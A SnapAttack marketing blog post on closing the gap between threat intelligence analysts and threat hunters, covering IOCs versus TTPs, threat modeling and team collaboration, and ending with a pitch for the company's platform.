We’ve expanded our partnership with Mandiant, now part of Google Cloud, to help our users operationalize and prioritize threat intelligence. READ THE PRESS RELEASE >

Creating Actionable Threat Intelligence for Threat Hunters

Ask any security leader and they’ll tell you actionable threat intelligence is the cornerstone of a successful, threat-informed security operations center (SOC). However, to be of any real value to the team, threat intelligence needs to be relevant, timely, and supportive of next steps for the teams that utilize it. Due to the sheer volume of threat intelligence and the challenges teams face to try and sift through it all, teams can’t easily find and action the intelligence that really matters…leaving reports unhelpful and unused. In fact, a recent report found that 93% of CISOs are concerned about dark web threats, but almost ¼ of CISOs have no threat intelligence capability at all.

Because threat intelligence analysts are siloed from other core functions in the SOC, like threat hunting, detection engineering, and incident response, they frequently package up their findings in verbose reports and struggle to prepare threat intelligence reports in a manner that’s meaningful to those advanced team members. As a result, threat intelligence reports don’t always contain the actionability or clear next steps that teams need to mobilize. In the end, reports can eat up a significant proportion of the security budget and amount to nothing more than shelfware (expensive shelfware).

To reap the full value of threat intelligence and utilize it to mobilize against relevant threats, analysts and hunters need to be on the same page from the start. Actionable threat intelligence contains significant information on which threats may impact the organization and how they might manifest; by understanding the threat hunters’ needs, goals, and approach to the hunt, threat intelligence analysts can prepare reports that transform the SOC into an intelligence-led, threat-informed organization.

There are three kinds of threat intelligence that each serve different purposes – the final category being the one that’s actually useful to threat hunters:
  • Tactical threat intelligence involves the investigation and identification of IOCs to guide network level action to remediate threats. It enables analysts to look at threats on a more individual level.
  • Strategic threat intelligence incorporates the broader threat trends in the context of the organization. This discipline helps teams calculate the risk and potential impact of threats as they relate to the strategic direction of the organization.
  • Operational threat intelligence is intelligence for threat hunters. It’s the work they do to catalog adversary behavior and determine complete remediation of the threat at hand. It provides them with a roadmap to take action against the adversary.

The Disconnect Explained: Where Does Threat Intelligence Fall Short?

Threat intelligence analysts and threat hunters share the same overall goal: protect the organization. So while they’re aiming for the same target, where (and why) are they missing each other?

Threat Intelligence Disconnect #1: IOCs vs. TTPs

Most intelligence reports contain verbose information about the threat with things like screenshots, IOCs, and more. Sometimes, they’ll include the analysts’ observations of commands and process execution – but there isn’t a standardized process to generate reports, and it can be hard to tell whether or not the information is comprehensive.

Additionally, the report will likely include a selection of IOCs that can be deployed as SecOps queries, but the questions remain: are they comprehensive? Have they been adequately enriched to determine maliciousness? As a reader, the hunter is left with more questions and work left to do rather than concrete answers and next steps.

Threat intelligence reports that provide actionless data require hunters to do their own research from the breadth of data they’ve been given, synthesizing various reports to come to their own conclusions. From there, they engineer a hunt based on the threat information available to them.
A great deal of available IOC data contains only discrete items that haven’t been enriched for further action. In order to extract value from them, threat hunters need to put them into their own systems, and use their own data feeds to determine their validity, relevancy, and comprehensiveness. Since IOCs are ephemeral and constantly changing, utilizing them in a threat hunt requires extensive effort on the part of the hunter.
As far as research goes, IOC data can offer great insights…but they’re not as useful as direct inputs for hunt and detection development (like TTPs).

Threat Intelligence Disconnect #2: Lack of Technical Alignment

Because threat intelligence teams must create reports to support so many different stakeholders, their reports aren’t always focused on the environmental nuances that matter most to threat hunters. Even if they have the right organizational context in mind, they’re likely focusing more on business risk and impact (to support leadership, like CISOs) rather than deep technical details.
Reports need to be understood by highly technical team members (threat hunters, detection engineers, etc.) AND more strategic people (CISOs, VPs, investors, etc.). Unfortunately, threat intelligence analysts are extremely under-resourced and don’t have the bandwidth to personally tailor each one for its intended audience.
Additionally, most threat intelligence reports are purposely generic due to contextual nuances in an organization’s industry or way of conducting business. For example, a large enterprise might dabble in various different industries or serve clients in many, very different environments – they need to be aware of the threats facing each industry they’ve got a stake in.
Another key challenge is that the ways that different organizations utilize tools in their tech stack can be vastly different from one to the next; just because that tool is experiencing a high-impact vulnerability for one use case doesn’t mean it will cause the same level of impact for others.

Threat Intelligence Disconnect #3: Outdated Information

Threat intelligence can quickly become outdated as the fast-paced threat landscape changes and evolves. Sometimes, because they’re taking a look back at what’s happened in their network, threat hunters do need historical data. An IP address that was malicious 6 months ago might not be malicious anymore, but if the hunter finds a connection to that IP 6 months back, it could be a signal to keep digging in that area to see if there is more evidence of breach.
However, the average SOC holds onto a LOT of data that corresponds to a single point in time. Threat hunters can’t possibly sift through all of the outdated data in their network in the hopes of finding something useful (especially if a significant amount of it is linked to IOCs with specific timestamps). IOCs are a big source of friction here, as they fail to acknowledge evergreen threat information like behaviors.
Another limitation is simply the nature of cybersecurity: it’s difficult to communicate information quickly enough to ensure it’s still relevant by the time it reaches the threat hunter. A major barrier is the ephemeral, ever-changing nature of security data; the burden to maintain data in a way that it stays relevant and correct is extremely high. As time goes on, the data stored in a SOC gets overwritten with new information, losing the historically significant context.

Threat Intelligence Disconnect #4: Strategic Misalignment

If organizations aren’t aligned from the very top all the way down, it’s challenging for individual teams to understand the correct intelligence collection requirements. Leadership must understand and share the security goals that the tactical teams are working towards. For that to happen, all teams need to be working from the same threat information – which requires a strong foundation of threat intelligence from the analysts.
To create this strategic alignment and invest in the right threat intelligence, organizations need to invest in tools that improve visibility into their threat landscape, such as:
  • Threat modeling
  • Threat profiles
  • MITRE ATT&CK mapping
The challenge? Few have the time or resources to buy, configure, and maintain this tooling. So they’re stuck improvising and taking best guesses at the threat information that sets the tone for their entire strategic security mission.

How to Create Actionable Threat Intelligence for Threat Hunters

Threat intelligence analysts are tasked with creating reports that are flexible, yet detailed; evergreen, yet quickly produced; and actionable, yet generic enough for different audiences. That’s a lot of competing qualities, and most of the time, the end result achieves almost none of them.
When threat intelligence analysts focus on the components that allow a threat hunter to take the report and immediately spring into action, they can create something that goes further than a piece of shelfware. They can enact real change and threat-informed defense within their organization.

Actionable Threat Intelligence Tip #1: Perform Enterprise Threat Modeling

When threat intelligence gathering and analysis begins with a thorough understanding of the organization’s priorities and areas of risk, threat intelligence analysts can narrow down their findings to those that are most important to teams like threat hunting. But how can they boil it all down to something that’s valuable to threat hunters specifically?
It all begins with a thorough understanding of their threat landscape, and the organization’s place within it. Analyzing the context of one’s organization can help the team understand what kinds of threats and actors are most likely to impact them.
Many organizations uncover their highest priority threats through threat modeling, the identification and mitigation of threats based on relevance, impact, and organizational risk. This information can be summarized in something like a threat profile, outlining the highest-probability threats based on factors specific to the organization, like:
  • Geographical location
  • Industry
  • Organization size
  • Tech stack
  • And more
To go even further, analysts can use TTPs and other indicators to build out threat actor profiles for their highest-priority threats. Threat actor profiles should brief hunters on the behaviors, methods, tools, and characteristics that will help them identify individual threat actors. Some of the behaviors in a threat actor profile might include details on how they’d manifest within the network, such as:
  • Unusual network traffic patterns
  • Unexpected file changes
  • Anomalies in user behavior

Actionable Threat Intelligence Tip #2: Go Beyond IOCs and Gather TTPs

Though IOCs are a critical component of any threat-informed strategy, they can’t carry the entire strategy alone. Because IOCs are timely and easy to change, threat hunters need insights gleaned from TTPs – insights that help them understand attacker behavior and where they’re headed, rather than the places they’ve already been.
Pyramid of pain - TTPs and IOCs

David Bianco’s Pyramid of Pain provides a stellar visual hierarchy of the differences between IOCs and TTPs. IOCs sit at the bottom of the pyramid because they’re less indicative of a specific threat actor and consist of indicators that are easy to change on the spot. Because threat hunters are actively searching for advanced, unknown threats, they need more sophisticated indicators like TTPs.

TTPs provide a behavioral focus that helps hunters understand core behaviors of the threat actor, predict their future moves, and trace their actions with a trail that’s harder for them to cover up. IOCs simply uncover what a threat actor has already done; TTPs tell threat hunters HOW the threat actor operates.

Actionable Threat Intelligence Tip #3: Provide Timely, Dynamic Insights

Threat actors move fast – but threat intelligence analysts need to move faster. In order for threat hunters to get ahead of relevant threats, the reports they’re working from should be updated with the most timely threat intelligence available.
Threat intelligence analysts must stay up-to-date on new and emerging threats, both as they’re released and as their information is updated. When a new zero day or CVE drops, threat intelligence analysts need to be the first to know – and they need to keep a close eye on how they develop.
To stay on top of threat information, analysts can utilize a variety of resources. Automated feeds are a great start, but they’re only the beginning. The most recent and relevant information tends to come from humans, using social media, forums, the news, word-of-mouth, and other manual formats.

Actionable Threat Intelligence Tip #4: Facilitate Collaboration

Though the two teams are typically siloed, the results they produce when they collaborate far outweigh what they can do alone. Threat intelligence and hunting teams should create channels so they can share insights, learn from one another, and ensure they’re both working towards the same strategic objectives.
For threat intelligence analysts and threat hunters to understand each other’s priorities and needs, they should implement continuous feedback loops. An open and consistent line of communication can help analysts understand what threat hunters need, and threat hunters provide feedback to drive further improvement on the strategy.

Threat hunters need the ability to provide feedback on the relevance and usefulness of threat intelligence reports, as well as request additional information. Additionally, if threat hunters can simply request information, intelligence analysts don’t have to guess what tohey should investigate.

A great use case for collaboration between intelligence and threat hunters is in the creation of a hunt hypothesis. Threat intelligence analysts can help hunters develop a hypothesis using the expansive context they have of the threat landscape and the organization. Alternatively, when threat hunters already have a hunt hypothesis in mind, they may need to do their own research – but if they have an open line of communication with intelligence, they can glean insights from them and their knowledge of the threat landscape.

Get Threat Intelligence and Threat Hunting Teams on the Same Page

Actionable threat intelligence is the key to an aligned and focused threat hunting strategy, but few organizations have the bandwidth, tooling, or visibility to keep the two teams on the same page.
SnapAttack is a centralized platform that streamlines threat hunting by uncovering the blindspots and priorities that organizations need to worry about. It helps siloed teams collaborate and share key insights so they’re both working from the same information – information that’s constantly updated and aligned to your threat landscape.

The platform ties your unique threat landscape into built-in threat intelligence from both our expert threat research team and Mandiant (now part of Google Cloud) to produce a dynamic, tailored Threat Profile. Get in touch with our team to find out how we can help you fortify your threat management today.

About SnapAttack: SnapAttack is an innovator in proactive, threat-informed security solutions. The SnapAttack platform helps organizations answer their most pressing question: “Are we protected against the threats that matter?”

By rolling threat intelligence, adversary emulation, detection engineering, threat hunting, and purple teaming into a single, easy-to-use product with a no-code interface, SnapAttack enables companies to get more from their tools and more from their teams so they can finally stay ahead of the threat.